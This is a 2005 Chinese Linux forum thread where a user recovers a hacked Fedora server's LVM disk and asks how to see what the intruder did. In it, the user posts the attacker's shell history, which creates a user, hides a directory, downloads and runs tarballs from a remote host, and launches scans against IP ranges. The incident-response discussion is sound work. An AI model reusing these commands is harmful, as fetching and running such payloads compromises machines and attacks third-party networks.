免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
12下一页
最近访问板块 发新帖
查看: 2348 | 回复: 16
打印 上一主题 下一主题

请教mount问题 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-10-04 02:03 |只看该作者 |倒序浏览
有一Fedora Core 3 系统,普通IDE硬盘30G,被黑。

另有一Fedora Core 3系统,装有2个普通IDE硬盘,运行正常。

我把被黑的硬盘,拆下,装到另一系统上的光驱线上。

启动后。

fdisk /dev/hdc
p

看到:

  1. Device    Boot      Start         End      Blocks   Id    System
  2. /dev/hdc1   *           1          13      104391     83   Linux
  3. /dev/hdc2              14        3737    29913030   8e  Linux LVM
复制代码


我就想把/dev/hdc2 mount上去。

但是出现错误如下:

  1. [root@localhost dev]# mount -t auto /dev/hdc2 /mnt/hdc2
  2. mount: you must specify the filesystem type

  3. [root@localhost dev]# mount -t ext3 /dev/hdc2 /mnt/hdc2
  4. mount: wrong fs type, bad option, bad superblock on /dev/hdc2,
  5.        or too many mounted file systems
复制代码


奇怪的是/dev/hdc1 用-t auto 和 -t ext3都可以mount.

论坛徽章:
33
荣誉会员
日期:2011-11-23 16:44:17天秤座
日期:2014-08-26 16:18:20天秤座
日期:2014-08-29 10:12:18丑牛
日期:2014-08-29 16:06:45丑牛
日期:2014-09-03 10:28:58射手座
日期:2014-09-03 16:01:17寅虎
日期:2014-09-11 14:24:21天蝎座
日期:2014-09-17 08:33:55IT运维版块每日发帖之星
日期:2016-04-17 06:23:27操作系统版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-24 06:20:0015-16赛季CBA联赛之天津
日期:2016-05-06 12:46:59
2 [报告]
发表于 2005-10-04 08:18 |只看该作者

请教mount问题

pvscan
vgscan
lvscan

然后试试 mount  lv 吧.

论坛徽章:
0
3 [报告]
发表于 2005-10-04 11:17 |只看该作者

请教mount问题

怎么黑呀

论坛徽章:
0
4 [报告]
发表于 2005-10-04 14:25 |只看该作者

请教mount问题

原帖由 "q1208c" 发表:
pvscan
vgscan
lvscan

然后试试 mount  lv 吧.


谢谢,明天去试试。

今天我先用单用户模式把root的密码清掉了。

顺便问一下,如何检查黑客在我的机器上做了什么?当然这是一个模糊的,难以回答的问题,但如果能给一点点提示,我就感激不尽了。

论坛徽章:
0
5 [报告]
发表于 2005-10-04 14:31 |只看该作者

请教mount问题

[quote]原帖由 "kylints"]怎么黑呀[/quote 发表:


我这个服务器是自己装着玩的,还没有保护措施。我用ssh在家里也可以连上,方便,但问题就来了。

其实,上个星期,我浏览/var/log/ 下的记录就发现有人再试root密码,我当时想,我一个很简单的密码,竟被试了几千次,我想看看到底会发生什么。

结果,周末,我在家里等不上去了。

而且更坏的是,今天一早上班,收到ISP的通知,说我的upload流量超了。。。

论坛徽章:
33
荣誉会员
日期:2011-11-23 16:44:17天秤座
日期:2014-08-26 16:18:20天秤座
日期:2014-08-29 10:12:18丑牛
日期:2014-08-29 16:06:45丑牛
日期:2014-09-03 10:28:58射手座
日期:2014-09-03 16:01:17寅虎
日期:2014-09-11 14:24:21天蝎座
日期:2014-09-17 08:33:55IT运维版块每日发帖之星
日期:2016-04-17 06:23:27操作系统版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-24 06:20:0015-16赛季CBA联赛之天津
日期:2016-05-06 12:46:59
6 [报告]
发表于 2005-10-04 14:51 |只看该作者

请教mount问题

原帖由 "qry" 发表:


谢谢,明天去试试。

今天我先用单用户模式把root的密码清掉了。

顺便问一下,如何检查黑客在我的机器上做了什么?当然这是一个模糊的,难以回答的问题,但如果能给一点点提示,我就感激不尽了。
   这个很不好说. 可以先试着看看 log, 如果没被清掉的话.

要是被清掉了就不好办了. 因为你太可能知道原来有哪些文件 , 哪些文件 被动过.

论坛徽章:
0
7 [报告]
发表于 2005-10-04 15:02 |只看该作者

请教mount问题

原帖由 "q1208c" 发表:
   这个很不好说. 可以先试着看看 log, 如果没被清掉的话.

要是被清掉了就不好办了. 因为你太可能知道原来有哪些文件 , 哪些文件 被动过.


还好,我还能看到一些 log,例如:/var/log/message, /var/log/secure等,估计那家伙忙着干坏事,忘了清这些了。

我记着有个兄弟在这里列过执行命令的记录,我忘了是哪个文件。

今天我把机器关了,所以只好等明天到公司去看了。

论坛徽章:
0
8 [报告]
发表于 2005-10-04 15:44 |只看该作者

请教mount问题

那个记录好像是history

论坛徽章:
0
9 [报告]
发表于 2005-10-05 00:46 |只看该作者

请教mount问题

看到了,大家分析一下:


  1.   883  adduser original
  2.   884  passwd original
  3.   885  uname -a
  4.   886  ps -x
  5.   887  cd /var/tmp
  6.   888  mkdir .bash
  7.   889   cd .bash
  8.   890  wget members.lycos.co.uk/cata89/netstat.tgz
  9.   891  tar zxvf netstat.tgz
  10.   892  cd netstat
  11.   893  cat mech.set
  12.   894  chmod +x *
  13.   895  ./inetd
  14.   896  ./inetd
  15.   897  ./inetd
  16.   898  ./inetd
  17.   899  ps -x
  18.   900  cd
  19.   901  ls
  20.   902  wget members.lycos.co.uk/cata89/team3.tgz
  21.   903  tar zxvf team3.tgz
  22.   904  cd team2
  23.   905  chmod +x *
  24.   906  ls
  25.   907  ./start 81.56
  26.   908  ./start 207.89
  27.   909  ./start 207.90
  28.   910  ./start 207.91
  29.   911  ./start 207.92
  30.   912  ./start 207.93
  31.   913  ./start 207.94
  32.   914  ./start 207.95
  33.   915  ./start 207.96
复制代码

论坛徽章:
0
10 [报告]
发表于 2005-10-05 00:51 |只看该作者

请教mount问题

[quote]原帖由 "cpsdc"]那个记录好像是history[/quote 发表:


我用history只看到从800号多开始,还好,他的操作都包括了。不过怎样能看到所有的history?
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP